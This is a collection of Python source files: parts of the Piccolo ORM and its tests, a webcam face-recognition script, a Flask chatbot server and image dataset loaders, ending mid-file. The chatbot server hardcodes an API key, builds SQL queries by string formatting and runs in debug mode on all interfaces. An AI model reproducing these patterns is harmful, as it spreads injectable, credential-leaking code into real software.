return self
def prefetch(
self, *fk_columns: t.Union[ForeignKey, t.List[ForeignKey]]
) -> Objects:
self.prefetch_delegate.prefetch(*fk_columns)
return self
def get(self, where: Combinable) -> Objects:
self.where_delegate.where(where)
self.limit_delegate.first()
return self
def offset(self, number: int) -> Objects:
self.offset_delegate.offset(number)
return self
def get_or_create(
self,
where: Combinable,
        defaults: t.Optional[t.Dict[t.Union[Column, str], t.Any]] = None,
    ):
        # Avoid a mutable default argument; fall back to an empty dict.
        return GetOrCreate(query=self, where=where, defaults=defaults or {})
def create(self, **columns: t.Any):
return Create(query=self, columns=columns)
def order_by(self, *columns: Column, ascending=True) -> Objects:
self.order_by_delegate.order_by(*columns, ascending=ascending)
return self
def where(self, *where: Combinable) -> Objects:
self.where_delegate.where(*where)
return self
async def batch(
self, batch_size: t.Optional[int] = None, **kwargs
) -> Batch:
if batch_size:
kwargs.update(batch_size=batch_size)
return await self.table._meta.db.batch(self, **kwargs)
async def response_handler(self, response):
if self.limit_delegate._first:
if len(response) == 0:
return None
if self.output_delegate._output.nested:
return make_nested(response[0])
else:
return response[0]
elif self.output_delegate._output.nested:
return [make_nested(i) for i in response]
else:
return response
@property
def default_querystrings(self) -> t.Sequence[QueryString]:
select = Select(table=self.table)
for attr in (
"limit_delegate",
"where_delegate",
"offset_delegate",
"output_delegate",
"order_by_delegate",
):
setattr(select, attr, getattr(self, attr))
if self.prefetch_delegate.fk_columns:
select.columns(*self.table.all_columns())
for fk in self.prefetch_delegate.fk_columns:
if isinstance(fk, ForeignKey):
select.columns(*fk.all_columns())
else:
raise ValueError(f"{fk} doesn't seem to be a ForeignKey.")
# Make sure that all intermediate objects are fully loaded.
for parent_fk in fk._meta.call_chain:
select.columns(*parent_fk.all_columns())
select.output_delegate.output(nested=True)
return select.querystrings
```
#### File: piccolo/testing/model_builder.py
```python
import json
import typing as t
from datetime import date, datetime, time, timedelta
from decimal import Decimal
from uuid import UUID
from piccolo.columns.base import Column
from piccolo.table import Table
from piccolo.testing.random_builder import RandomBuilder
from piccolo.utils.sync import run_sync
class ModelBuilder:
__DEFAULT_MAPPER: t.Dict[t.Type, t.Callable] = {
bool: RandomBuilder.next_bool,
bytes: RandomBuilder.next_bytes,
date: RandomBuilder.next_date,
datetime: RandomBuilder.next_datetime,
float: RandomBuilder.next_float,
int: RandomBuilder.next_int,
str: RandomBuilder.next_str,
time: RandomBuilder.next_time,
timedelta: RandomBuilder.next_timedelta,
UUID: RandomBuilder.next_uuid,
}
@classmethod
async def build(
cls,
table_class: t.Type[Table],
        defaults: t.Optional[t.Dict[t.Union[Column, str], t.Any]] = None,
persist: bool = True,
minimal: bool = False,
) -> Table:
"""
Build Table instance with random data and save async.
This can build relationships, supported data types and parameters.
:param table_class:
Table class to randomize.
        Examples:
            manager = await ModelBuilder.build(Manager)
            manager = await ModelBuilder.build(
                Manager, defaults={Manager.name: 'Guido'}
            )
            manager = await ModelBuilder.build(Manager, persist=False)
            manager = await ModelBuilder.build(Manager, minimal=True)
            band = await ModelBuilder.build(Band, defaults={Band.manager: manager})
"""
return await cls._build(
table_class=table_class,
defaults=defaults,
persist=persist,
minimal=minimal,
)
@classmethod
def build_sync(
cls,
table_class: t.Type[Table],
        defaults: t.Optional[t.Dict[t.Union[Column, str], t.Any]] = None,
persist: bool = True,
minimal: bool = False,
) -> Table:
"""
Build Table instance with random data and save sync.
This can build relationships, supported data types and parameters.
:param table_class:
Table class to randomize.
        Examples:
            manager = ModelBuilder.build_sync(Manager)
            manager = ModelBuilder.build_sync(
                Manager, defaults={Manager.name: 'Guido'}
            )
            manager = ModelBuilder.build_sync(Manager, persist=False)
            manager = ModelBuilder.build_sync(Manager, minimal=True)
            band = ModelBuilder.build_sync(Band, defaults={Band.manager: manager})
"""
return run_sync(
cls.build(
table_class=table_class,
defaults=defaults,
persist=persist,
minimal=minimal,
)
)
@classmethod
async def _build(
cls,
table_class: t.Type[Table],
        defaults: t.Optional[t.Dict[t.Union[Column, str], t.Any]] = None,
minimal: bool = False,
persist: bool = True,
) -> Table:
model = table_class()
defaults = {} if not defaults else defaults
for column, value in defaults.items():
if isinstance(column, str):
column = model._meta.get_column_by_name(column)
setattr(model, column._meta.name, value)
for column in model._meta.columns:
if column._meta.null and minimal:
continue
if column._meta.name in defaults:
continue # Column value exists
if "references" in column._meta.params and persist:
reference_model = await cls._build(
column._meta.params["references"],
persist=True,
)
random_value = getattr(
reference_model,
reference_model._meta.primary_key._meta.name,
)
else:
random_value = cls._randomize_attribute(column)
setattr(model, column._meta.name, random_value)
if persist:
await model.save().run()
return model
@classmethod
def _randomize_attribute(cls, column: Column) -> t.Any:
"""
Generate a random value for a column and apply formatting.
:param column:
Column class to randomize.
"""
if column.value_type == Decimal:
precision, scale = column._meta.params["digits"]
random_value = RandomBuilder.next_float(
maximum=10 ** (precision - scale), scale=scale
)
elif column._meta.choices:
random_value = RandomBuilder.next_enum(column._meta.choices)
else:
random_value = cls.__DEFAULT_MAPPER[column.value_type]()
if "length" in column._meta.params and isinstance(random_value, str):
return random_value[: column._meta.params["length"]]
elif column.column_type in ["JSON", "JSONB"]:
return json.dumps(random_value)
return random_value
```
#### File: 0scarB/piccolo/setup.py
```python
import itertools
import os
import typing as t
from setuptools import find_packages, setup
from piccolo import __VERSION__ as VERSION
directory = os.path.abspath(os.path.dirname(__file__))
extras = ["orjson", "playground", "postgres", "sqlite", "uvloop"]
with open(os.path.join(directory, "README.md")) as f:
LONG_DESCRIPTION = f.read()
def parse_requirement(req_path: str) -> t.List[str]:
"""
Parse requirement file.
Example:
parse_requirement('requirements.txt') # requirements/requirements.txt
parse_requirement('extras/playground.txt') # requirements/extras/playground.txt
Returns:
List[str]: list of requirements specified in the file.
""" # noqa: E501
with open(os.path.join(directory, "requirements", req_path)) as f:
contents = f.read()
return [i.strip() for i in contents.strip().split("\n")]
def extras_require() -> t.Dict[str, t.List[str]]:
"""
Parse requirements in requirements/extras directory
"""
extra_requirements = {}
for extra in extras:
extra_requirements[extra] = parse_requirement(
os.path.join("extras", extra + ".txt")
)
extra_requirements["all"] = [
i for i in itertools.chain.from_iterable(extra_requirements.values())
]
return extra_requirements
setup(
name="piccolo",
version=VERSION,
description=(
"A fast, user friendly ORM and query builder which supports asyncio."
),
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
author="<NAME>",
author_email="<EMAIL>",
python_requires=">=3.7.0",
url="https://github.com/piccolo-orm/piccolo",
packages=find_packages(exclude=("tests",)),
package_data={
"": [
"templates/*",
"templates/**/*",
"templates/**/**/*",
"templates/**/**/**/*",
],
"piccolo": ["py.typed"],
},
install_requires=parse_requirement("requirements.txt"),
extras_require=extras_require(),
license="MIT",
classifiers=[
"License :: OSI Approved :: MIT License",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: Implementation :: CPython",
"Framework :: AsyncIO",
"Typing :: Typed",
"Topic :: Database",
],
entry_points={"console_scripts": ["piccolo = piccolo.main:main"]},
)
```
#### File: fixtures/commands/test_shared.py
```python
import datetime
import decimal
import uuid
from unittest import TestCase
from piccolo.apps.fixtures.commands.shared import (
FixtureConfig,
create_pydantic_fixture_model,
)
class TestShared(TestCase):
def test_shared(self):
pydantic_model = create_pydantic_fixture_model(
fixture_configs=[
FixtureConfig(
app_name="mega",
table_class_names=["MegaTable", "SmallTable"],
)
]
)
data = {
"mega": {
"SmallTable": [{"id": 1, "varchar_col": "Test"}],
"MegaTable": [
{
"id": 1,
"bigint_col": 1,
"boolean_col": True,
"bytea_col": b"hello",
"date_col": datetime.date(2021, 1, 1),
"foreignkey_col": 1,
"integer_col": 1,
"interval_col": datetime.timedelta(seconds=10),
"json_col": '{"a":1}',
"jsonb_col": '{"a": 1}',
"numeric_col": decimal.Decimal("1.10"),
"real_col": 1.100000023841858,
"smallint_col": 1,
"text_col": "hello",
"timestamp_col": datetime.datetime(2021, 1, 1, 0, 0),
"timestamptz_col": datetime.datetime(
2021, 1, 1, 0, 0, tzinfo=datetime.timezone.utc
),
"uuid_col": uuid.UUID(
"12783854-c012-4c15-8183-8eecb46f2c4e"
),
"varchar_col": "hello",
"unique_col": "hello",
"null_col": None,
"not_null_col": "hello",
}
],
}
}
model = pydantic_model(**data)
self.assertEqual(model.mega.SmallTable[0].id, 1)
self.assertEqual(model.mega.MegaTable[0].id, 1)
```
#### File: migrations/commands/test_check.py
```python
from unittest import TestCase
from unittest.mock import MagicMock, patch
from piccolo.apps.migrations.commands.check import CheckMigrationManager, check
from piccolo.conf.apps import AppRegistry
from piccolo.utils.sync import run_sync
class TestCheckMigrationCommand(TestCase):
@patch.object(
CheckMigrationManager,
"get_app_registry",
)
def test_check_migrations(self, get_app_registry: MagicMock):
get_app_registry.return_value = AppRegistry(
apps=["piccolo.apps.user.piccolo_app"]
)
# Make sure it runs without raising an exception:
run_sync(check())
```
#### File: tests/columns/test_jsonb.py
```python
from unittest import TestCase
from piccolo.columns.column_types import JSONB
from piccolo.table import Table
from ..base import postgres_only
class MyTable(Table):
json = JSONB()
@postgres_only
class TestJSONB(TestCase):
def setUp(self):
MyTable.create_table().run_sync()
def tearDown(self):
MyTable.alter().drop_table().run_sync()
def test_json(self):
"""
Test storing a valid JSON string.
"""
row = MyTable(json='{"a": 1}')
row.save().run_sync()
self.assertEqual(row.json, '{"a": 1}')
def test_arrow(self):
"""
Test using the arrow function to retrieve a subset of the JSON.
"""
MyTable(json='{"a": 1}').save().run_sync()
row = MyTable.select(MyTable.json.arrow("a")).first().run_sync()
self.assertEqual(row["?column?"], "1")
def test_arrow_as_alias(self):
"""
Test using the arrow function to retrieve a subset of the JSON.
"""
MyTable(json='{"a": 1}').save().run_sync()
row = (
MyTable.select(MyTable.json.arrow("a").as_alias("a"))
.first()
.run_sync()
)
self.assertEqual(row["a"], "1")
def test_arrow_where(self):
"""
Make sure the arrow function can be used within a WHERE clause.
"""
MyTable(json='{"a": 1}').save().run_sync()
self.assertEqual(
MyTable.count().where(MyTable.json.arrow("a") == "1").run_sync(), 1
)
self.assertEqual(
MyTable.count().where(MyTable.json.arrow("a") == "2").run_sync(), 0
)
def test_arrow_first(self):
"""
Make sure the arrow function can be used with the first clause.
"""
MyTable.insert(
MyTable(json='{"a": 1}'),
MyTable(json='{"b": 2}'),
).run_sync()
self.assertEqual(
MyTable.select(MyTable.json.arrow("a").as_alias("json"))
.first()
.run_sync(),
{"json": "1"},
)
```
#### File: tests/columns/test_json.py
```python
from unittest import TestCase
from piccolo.columns.column_types import JSON
from piccolo.table import Table
class MyTable(Table):
json = JSON()
class MyTableDefault(Table):
"""
Test the different default types.
"""
json = JSON()
json_str = JSON(default="{}")
json_dict = JSON(default={})
json_list = JSON(default=[])
json_none = JSON(default=None, null=True)
class TestJSONSave(TestCase):
def setUp(self):
MyTable.create_table().run_sync()
def tearDown(self):
MyTable.alter().drop_table().run_sync()
def test_json_string(self):
"""
Test storing a valid JSON string.
"""
row = MyTable(json='{"a": 1}')
row.save().run_sync()
self.assertEqual(
MyTable.select(MyTable.json)
.first()
.run_sync()["json"]
.replace(" ", ""),
'{"a":1}',
)
def test_json_object(self):
"""
Test storing a valid JSON object.
"""
row = MyTable(json={"a": 1})
row.save().run_sync()
self.assertEqual(
MyTable.select(MyTable.json)
.first()
.run_sync()["json"]
.replace(" ", ""),
'{"a":1}',
)
class TestJSONDefault(TestCase):
def setUp(self):
MyTableDefault.create_table().run_sync()
def tearDown(self):
MyTableDefault.alter().drop_table().run_sync()
def test_json_default(self):
row = MyTableDefault()
row.save().run_sync()
self.assertEqual(row.json, "{}")
self.assertEqual(row.json_str, "{}")
self.assertEqual(row.json_dict, "{}")
self.assertEqual(row.json_list, "[]")
self.assertEqual(row.json_none, None)
    def test_invalid_default(self):
        # Each value needs its own assertRaises block; otherwise values
        # after the first one that raises are never exercised.
        for value in ("a", 1, ("x", "y", "z")):
            with self.assertRaises(ValueError):
                JSON(default=value)
class TestJSONInsert(TestCase):
def setUp(self):
MyTable.create_table().run_sync()
def tearDown(self):
MyTable.alter().drop_table().run_sync()
def check_response(self):
self.assertEqual(
MyTable.select(MyTable.json)
.first()
.run_sync()["json"]
.replace(" ", ""),
'{"message":"original"}',
)
def test_json_string(self):
"""
Test inserting using a string.
"""
row = MyTable(json='{"message": "original"}')
MyTable.insert(row).run_sync()
self.check_response()
def test_json_object(self):
"""
Test inserting using an object.
"""
row = MyTable(json={"message": "original"})
        MyTable.insert(row).run_sync()
        self.check_response()
class TestJSONUpdate(TestCase):
def setUp(self):
MyTable.create_table().run_sync()
def tearDown(self):
MyTable.alter().drop_table().run_sync()
def add_row(self):
row = MyTable(json={"message": "original"})
row.save().run_sync()
def check_response(self):
self.assertEqual(
MyTable.select(MyTable.json)
.first()
.run_sync()["json"]
.replace(" ", ""),
'{"message":"updated"}',
)
def test_json_update_string(self):
"""
Test updating a JSON field using a string.
"""
self.add_row()
MyTable.update({MyTable.json: '{"message": "updated"}'}).run_sync()
self.check_response()
def test_json_update_object(self):
"""
Test updating a JSON field using an object.
"""
self.add_row()
MyTable.update({MyTable.json: {"message": "updated"}}).run_sync()
self.check_response()
```
#### File: tests/columns/test_timestamptz.py
```python
import datetime
from unittest import TestCase
from dateutil import tz
from piccolo.columns.column_types import Timestamptz
from piccolo.columns.defaults.timestamptz import (
TimestamptzCustom,
TimestamptzNow,
TimestamptzOffset,
)
from piccolo.table import Table
class MyTable(Table):
created_on = Timestamptz()
class MyTableDefault(Table):
"""
A table containing all of the possible `default` arguments for
`Timestamptz`.
"""
created_on = Timestamptz(default=TimestamptzNow())
created_on_offset = Timestamptz(default=TimestamptzOffset(days=1))
created_on_custom = Timestamptz(default=TimestamptzCustom(year=2021))
created_on_datetime = Timestamptz(
default=datetime.datetime(year=2020, month=1, day=1)
)
class CustomTimezone(datetime.tzinfo):
pass
class TestTimestamptz(TestCase):
def setUp(self):
MyTable.create_table().run_sync()
def tearDown(self):
MyTable.alter().drop_table().run_sync()
def test_timestamptz_timezone_aware(self):
"""
Test storing a timezone aware timestamp.
"""
for tzinfo in (
datetime.timezone.utc,
tz.gettz("America/New_York"),
):
created_on = datetime.datetime(
year=2020,
month=1,
day=1,
hour=12,
minute=0,
second=0,
tzinfo=tzinfo,
)
row = MyTable(created_on=created_on)
row.save().run_sync()
# Fetch it back from the database
result = (
MyTable.objects()
.where(
MyTable._meta.primary_key
== getattr(row, MyTable._meta.primary_key._meta.name)
)
.first()
.run_sync()
)
self.assertEqual(result.created_on, created_on)
# The database converts it to UTC
self.assertEqual(result.created_on.tzinfo, datetime.timezone.utc)
class TestTimestamptzDefault(TestCase):
def setUp(self):
MyTableDefault.create_table().run_sync()
def tearDown(self):
MyTableDefault.alter().drop_table().run_sync()
def test_timestamptz_default(self):
"""
Make sure the default value gets created, and can be retrieved.
"""
created_on = datetime.datetime.now(tz=datetime.timezone.utc)
row = MyTableDefault()
row.save().run_sync()
result = MyTableDefault.objects().first().run_sync()
delta = result.created_on - created_on
self.assertTrue(delta < datetime.timedelta(seconds=1))
self.assertEqual(result.created_on.tzinfo, datetime.timezone.utc)
```
#### File: music/piccolo_migrations/2021-07-25T22-38-48-009306.py
```python
from enum import Enum
from piccolo.apps.migrations.auto import MigrationManager
from piccolo.columns.column_types import JSON, JSONB, Varchar
from piccolo.columns.indexes import IndexMethod
ID = "2021-07-25T22:38:48:009306"
VERSION = "0.26.0"
async def forwards():
manager = MigrationManager(migration_id=ID, app_name="music")
manager.add_table("Shirt", tablename="shirt")
manager.add_table("RecordingStudio", tablename="recording_studio")
manager.add_column(
table_class_name="Shirt",
tablename="shirt",
column_name="size",
column_class_name="Varchar",
column_class=Varchar,
params={
"length": 1,
"default": "l",
"null": False,
"primary": False,
"key": False,
"unique": False,
"index": False,
"index_method": IndexMethod.btree,
"choices": Enum(
"Size", {"small": "s", "medium": "m", "large": "l"}
),
},
)
manager.add_column(
table_class_name="RecordingStudio",
tablename="recording_studio",
column_name="facilities",
column_class_name="JSON",
column_class=JSON,
params={
"default": "{}",
"null": False,
"primary": False,
"key": False,
"unique": False,
"index": False,
"index_method": IndexMethod.btree,
"choices": None,
},
)
manager.add_column(
table_class_name="RecordingStudio",
tablename="recording_studio",
column_name="facilities_b",
column_class_name="JSONB",
column_class=JSONB,
params={
"default": "{}",
"null": False,
"primary": False,
"key": False,
"unique": False,
"index": False,
"index_method": IndexMethod.btree,
"choices": None,
},
)
return manager
```
#### File: table/instance/test_get_related_readable.py
```python
from tests.base import DBTestCase
from tests.example_apps.music.tables import Band
class TestGetRelatedReadable(DBTestCase):
def test_get_related_readable(self):
"""
Make sure you can get the `Readable` representation for related object
from another object instance.
"""
self.insert_row()
response = Band.select(
Band.name, Band._get_related_readable(Band.manager)
).run_sync()
self.assertEqual(
response, [{"name": "Pythonistas", "manager_readable": "Guido"}]
)
# TODO Need to make sure it can go two levels deep ...
# e.g. Concert._get_related_readable(Concert.band_1.manager)
```
#### File: tests/table/test_count.py
```python
from tests.example_apps.music.tables import Band
from ..base import DBTestCase
class TestCount(DBTestCase):
    def test_count(self):
        self.insert_rows()
        response = Band.count().where(Band.name == "Pythonistas").run_sync()
        self.assertEqual(response, 1)
```
#### File: tests/table/test_metaclass.py
```python
from unittest import TestCase
from piccolo.columns import Secret
from piccolo.columns.column_types import JSON, JSONB, ForeignKey
from piccolo.table import Table
from tests.example_apps.music.tables import Band
class TestMetaClass(TestCase):
def test_tablename(self):
self.assertEqual(Band._meta.tablename, "band")
def test_protected_table_names(self):
"""
Some tablenames are forbidden because they're reserved words in the
database, and can potentially cause issues.
"""
with self.assertRaises(ValueError):
class User(Table):
pass
with self.assertRaises(ValueError):
class MyUser(Table, tablename="user"):
pass
def test_help_text(self):
"""
Make sure help_text can be set for the Table.
"""
help_text = "The manager of a band."
class Manager(Table, help_text=help_text):
pass
self.assertEqual(Manager._meta.help_text, help_text)
def test_foreign_key_columns(self):
"""
Make sure TableMeta.foreign_keys and TableMeta.foreign_key_references
are setup correctly.
"""
class TableA(Table):
pass
class TableB(Table):
table_a = ForeignKey(references=TableA)
self.assertEqual(TableB._meta.foreign_key_columns, [TableB.table_a])
self.assertEqual(TableA._meta.foreign_key_references, [TableB.table_a])
def test_secret_columns(self):
"""
Make sure TableMeta.secret_columns are setup correctly.
"""
class Classified(Table):
top_secret = Secret()
self.assertEqual(
Classified._meta.secret_columns, [Classified.top_secret]
)
def test_json_columns(self):
"""
Make sure TableMeta.json_columns are setup correctly.
"""
class MyTable(Table):
column_a = JSON()
column_b = JSONB()
self.assertEqual(
MyTable._meta.json_columns, [MyTable.column_a, MyTable.column_b]
)
def test_id_column(self):
"""
Makes sure an id column is added.
"""
class TableA(Table):
pass
self.assertTrue(hasattr(TableA, "id"))
```
#### File: piccolo/tests/test_main.py
```python
from unittest import TestCase
from piccolo.main import main
class TestMain(TestCase):
def test_main(self):
# Just make sure it runs without raising any errors.
main()
```
#### File: tests/utils/test_lazy_loader.py
```python
from unittest import TestCase, mock
from piccolo.utils.lazy_loader import LazyLoader
from tests.base import postgres_only, sqlite_only
class TestLazyLoader(TestCase):
def test_lazy_loading_database_driver(self):
_ = LazyLoader("asyncpg", globals(), "asyncpg")
@postgres_only
def test_lazy_loader_asyncpg_exception(self):
lazy_loader = LazyLoader("asyncpg", globals(), "asyncpg.connect")
with mock.patch("asyncpg.connect") as module:
module.side_effect = ModuleNotFoundError()
with self.assertRaises(ModuleNotFoundError):
lazy_loader._load()
@sqlite_only
def test_lazy_loader_aiosqlite_exception(self):
lazy_loader = LazyLoader("aiosqlite", globals(), "aiosqlite.connect")
with mock.patch("aiosqlite.connect") as module:
module.side_effect = ModuleNotFoundError()
with self.assertRaises(ModuleNotFoundError):
lazy_loader._load()
``` |
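As a hedged sketch of the pattern these tests exercise (behaviour inferred from the tests above, not from the `LazyLoader` source): the wrapped module is only imported on first attribute access, so a missing driver fails late rather than at import time.
```python
from piccolo.utils.lazy_loader import LazyLoader

# No import of asyncpg happens yet.
asyncpg = LazyLoader("asyncpg", globals(), "asyncpg")

async def connect(dsn: str):
    # First attribute access triggers the real import; a missing driver
    # surfaces as ModuleNotFoundError here, not at module load time.
    return await asyncpg.connect(dsn=dsn)
```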
{
"source": "0Shark/SindiAIDev",
"score": 3
} |
#### File: 0Shark/SindiAIDev/face_recon.py
```python
import face_recognition
import cv2
import numpy as np
def webcam_detection(known_image, display_name):
# Get a reference to webcam #0 (the default one)
video_capture = cv2.VideoCapture(0)
# Load a sample picture and learn how to recognize it.
known_face_encoding = face_recognition.face_encodings(known_image)[0]
# Create arrays of known face encodings and their names
known_face_encodings = [
known_face_encoding
]
known_face_names = [
display_name
]
# Initialize some variables
face_locations = []
face_encodings = []
face_names = []
process_this_frame = True
while True:
# Grab a single frame of video
ret, frame = video_capture.read()
# Resize frame of video to 1/4 size for faster face recognition processing
small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)
# Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)
rgb_small_frame = small_frame[:, :, ::-1]
# Only process every other frame of video to save time
if process_this_frame:
# Find all the faces and face encodings in the current frame of video
face_locations = face_recognition.face_locations(rgb_small_frame)
face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
face_names = []
for face_encoding in face_encodings:
# See if the face is a match for the known face(s)
matches = face_recognition.compare_faces(known_face_encodings, face_encoding)
name = "Unknown user"
# # If a match was found in known_face_encodings, just use the first one.
# if True in matches:
# first_match_index = matches.index(True)
# name = known_face_names[first_match_index]
# Or instead, use the known face with the smallest distance to the new face
face_distances = face_recognition.face_distance(known_face_encodings, face_encoding)
best_match_index = np.argmin(face_distances)
                if matches[best_match_index]:
                    name = known_face_names[best_match_index]
                    # Release the camera before returning a successful match.
                    video_capture.release()
                    cv2.destroyAllWindows()
                    return True
face_names.append(name)
process_this_frame = not process_this_frame
# Display the resulting image
# cv2.imshow('SindiAI-Detector', frame)
# Hit 'q' on the keyboard to quit!
if cv2.waitKey(1) & 0xFF == ord('q'):
break
    video_capture.release()
    cv2.destroyAllWindows()
    # No face match was confirmed before the loop ended.
    return False
```
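A minimal usage sketch (the image path and display name are hypothetical; `face_recognition.load_image_file` is the library's standard loader):
```python
import face_recognition

from face_recon import webcam_detection

# Hypothetical reference photo of the user to verify.
known_image = face_recognition.load_image_file("known_user.jpg")

if webcam_detection(known_image, "Known User"):
    print("Face verified via webcam.")
else:
    print("Face could not be verified.")
```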
#### File: 0Shark/SindiAIDev/server.py
```python
from flask import Flask, render_template, request
import pymysql
import utils
from pyowm import OWM
# OpenWeather
weatherAPI_token = "44edc82d5c54a7d0cd68aec1904e810e"
mgr = OWM(weatherAPI_token)
# initializing variables
s = 0
q = 0
facehash = ""
app = Flask(__name__)
def insert_sql(user_input):  # insert the user input and bot response into the database
global s
global facehash
s = s + 1 # ID
resp = utils.giveInput(user_input, facehash)
resp = str(resp)
    try:
        # Parameterized query avoids SQL injection and manual quoting bugs.
        sql = "INSERT INTO user_bot_chat (id, User_input, Bot_output) VALUES (%s, %s, %s);"
        a.execute(sql, (str(s), user_input, resp))
        conn.commit()
    except Exception as e:
        print("Exception occurred in insert_sql: {}".format(e))
def user_list(): # extracting user inputs from user_bot_chat database
user = []
sql = 'select User_input from user_bot_chat;'
a.execute(sql)
w_user = list(a.fetchall())
for i in w_user:
# user.append('You: ' + i[0])
user.append(i[0])
return user
def bot_list(): # extracting bot responses from user_bot_chat database
bot = []
sql = 'select Bot_output from user_bot_chat;'
a.execute(sql)
w_bot = list(a.fetchall())
for i in w_bot:
# bot.append('Sindi' + i[0])
bot.append(i[0])
return bot
@app.route('/home') # links to the first page - index.html
def index():
weather = getWeather()
return render_template("index.html", user_input=r(), temp=weather[0], location=weather[1], icon=weather[2], humidity=weather[3], wind=weather[4], music=utils.music_playing())
@app.route('/')  # links to the setup page - setup.html
def home():
return render_template("setup.html")
@app.route('/setup', methods=['POST'])
def setup():
weather = getWeather()
global facehash
    facehash = request.form["facehash"]
return render_template("index.html", user_input=r(), temp=weather[0], location=weather[1], icon=weather[2], humidity=weather[3], wind=weather[4], music=utils.music_playing())
@app.route('/clear')
def clearChat():
weather = getWeather()
# Clear all table rows
sql = "TRUNCATE TABLE user_bot_chat;"
a.execute(sql)
return render_template("index.html", user_input=r(), temp=weather[0], location=weather[1], icon=weather[2], humidity=weather[3], wind=weather[4], music=utils.music_playing())
def r():  # gathers user inputs and bot outputs into one list to render in the template
    try:
        user_input = request.form["user_input"]
        insert_sql(user_input)
    except Exception:
        pass  # no new input submitted; just rebuild the chat history
    r = []
    user = user_list()
    bot = bot_list()
    for j in range(0, len(user)):
        r.append(user[j])
        r.append(bot[j])
    return r
def getWeather():
observation = mgr.weather_at_place('Tirana')
w = observation.get_weather()
wind_data = w.get_wind()
humidity = w.get_humidity()
temp_data = w.get_temperature('celsius')
icon = w.get_weather_icon_name()
weatherData = [str(int(temp_data['temp'])), 'Tirana', str(icon), str(int(humidity)), str(int(wind_data['speed']))]
return weatherData
@app.route('/process', methods=['POST'])
def process():
weather = getWeather()
# called when user input is given and submit button is pressed
return render_template("index.html", user_input=r(), temp=weather[0], location=weather[1], icon=weather[2], humidity=weather[3], wind=weather[4], music=utils.music_playing())
if __name__ == '__main__':
try: # connects to the database
conn = pymysql.connect(host='localhost', user='root', password='', db='sindi_db')
a = conn.cursor()
except Exception as e:
print("QUERY ERROR: Connection")
print("Exeception occured:{}".format(e))
app.run(host='0.0.0.0', port=int('8000'), debug=True) # 0.0.0.0.,80
# conn.close()
# a.close()
``` |
{
"source": "0shimax/backtest-example",
"score": 3
} |
#### File: datasets/image/image_dataset.py
```python
from pathlib import PurePosixPath
from typing import Any, Dict
import fsspec
import numpy as np
from PIL import Image
from kedro.io import AbstractDataSet
from kedro.io.core import get_filepath_str, get_protocol_and_path
class ImageDataSet(AbstractDataSet):
"""``ImageDataSet`` loads / save image data from a given filepath as `numpy` array using Pillow.
ref: https://kedro.readthedocs.io/en/stable/07_extend_kedro/03_custom_datasets.html
Example:
::
>>> ImageDataSet(filepath='/img/file/path.png')
"""
def __init__(self, filepath: str):
"""Creates a new instance of ImageDataSet to load / save image data for given filepath.
Args:
filepath: The location of the image file to load / save data.
"""
protocol, path = get_protocol_and_path(filepath)
self._protocol = protocol
self._filepath = PurePosixPath(path)
self._fs = fsspec.filesystem(self._protocol)
def _load(self) -> np.ndarray:
"""Loads data from the image file.
Returns:
Data from the image file as a numpy array
"""
load_path = get_filepath_str(self._filepath, self._protocol)
with self._fs.open(load_path, mode="r") as f:
image = Image.open(f).convert("RGBA")
return np.asarray(image)
def _save(self, data: np.ndarray) -> None:
"""Saves image data to the specified filepath."""
save_path = get_filepath_str(self._filepath, self._protocol)
with self._fs.open(save_path, mode="wb") as f:
image = Image.fromarray(data)
image.save(f)
def _describe(self) -> Dict[str, Any]:
"""Returns a dict that describes the attributes of the dataset."""
return dict(filepath=self._filepath, protocol=self._protocol)
``` |
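A short usage sketch via the public `AbstractDataSet` interface (`load`/`save` wrap `_load`/`_save`; the file path is illustrative):
```python
import numpy as np

# Hypothetical local image path.
data_set = ImageDataSet(filepath="data/01_raw/example.png")

image = data_set.load()    # -> np.ndarray of shape (H, W, 4), RGBA
print(image.shape, image.dtype)

data_set.save(image)       # writes the array back out through Pillow
```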
{
"source": "0shimax/chainer-feedbacknet",
"score": 2
} |
#### File: common/image_processor/mini_batch_loader.py
```python
import os, sys
sys.path.append('./src/common/image_processor')
sys.path.append('./src/common/text_processor')
sys.path.append('./src/common/image_processor/feature_extractor')
import chainer
import cv2
import numpy as np
np.random.seed(555)
from contextlib import ExitStack
import numbers
from image_normalizer import ImageNormalizer
from tokenizer import Tokenizer
from feature_extractor_utils import show_image
from cell_diameters import compute_cell_diameter
from nucleus_diamiters import compute_nucleus_diameter
class DatasetPreProcessor(chainer.dataset.DatasetMixin):
def __init__(self, args):
"""args type is EasyDict class
"""
labels = list('ABCDEFGHIJKLMNOPQRS')
self.label2clsval = {l:i for i,l in enumerate(labels)}
self.args = args
self.gray = args.converse_gray
self.image_normalizer = ImageNormalizer()
self.pairs = self.read_paths()
self.counter = 0
self.image_size_in_batch = [None, None] # height, width
if args.generate_comment:
self.inputs_tokens = self.compute_token_ids() # return numpy array
def __len__(self):
return len(self.pairs)
def read_paths(self):
path_label_pairs = []
for image_path, label in self.path_label_pair_generator():
if not label.isdigit() and not label=='-1':
label = self.label2clsval[label]
path_label_pairs.append((image_path, label))
return path_label_pairs
def path_label_pair_generator(self):
with ExitStack () as stack:
f_image = stack.enter_context(open(self.args.image_pointer_path, 'r'))
f_label = stack.enter_context(open(self.args.labels_file_path, 'r'))
for image_file_name, label in zip(f_image, f_label):
image_file_name = image_file_name.rstrip()
image_full_path = os.path.join(self.args.image_dir_path, image_file_name)
if os.path.isfile(image_full_path):
yield image_full_path, label.rstrip()
else:
raise RuntimeError("file is not fined: {}.".format(image_full_path))
def __init_batch_counter(self):
if self.args.train and self.counter==self.args.training_params.batch_size:
self.counter = 0
self.image_size_in_batch = [None, None]
def __set_image_size_in_batch(self, image):
if self.counter==1:
resized_h, resized_w = image.shape[:2]
self.image_size_in_batch = [resized_h, resized_w]
def get_example(self, index):
self.counter += 1
if self.args.debug_mode:
if self.counter>15:
assert False, 'stop test'
path, label = self.pairs[index]
        image = cv2.imread(path)
        if image is None:
            raise RuntimeError("invalid image: {}".format(path))
        src_image = image.copy()
if self.args.debug_mode:
show_image(image)
# cv2.imwrite("/Users/naoki_shimada/Downloads/Origin.jpg", image)
# gray transform if converse_gray is True
image = self.color_trancefer(image)
        h, w, ch = image.shape
